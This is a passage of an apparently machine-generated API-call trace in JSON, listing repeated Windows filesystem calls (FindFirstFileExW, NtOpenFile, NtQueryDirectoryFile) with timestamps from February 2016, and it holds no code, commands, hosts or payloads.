"FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,766", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,776", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,776", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,776", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,776", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,776", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,776", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,776", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,776", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,776", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,776", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,776", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,776", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,776", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,776", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,776", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,776", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,776", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,776", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,776", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,776", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,776", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,776", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,776", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,776", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,857", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,867", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,867", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,867", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,867", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,867", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,867", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,867", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,867", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,867", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,867", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,897", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,987", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,987", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,987", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,987", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,987", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,987", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,987", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,987", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,987", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,987", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,997", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,037", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,037", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,037", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,037", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,037", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,037", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,037", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,117", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,117", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,117", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,117", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,117", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,117", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,117", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,117", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,117", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,117", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,117", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,117", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,117", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,117", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,127", "api": 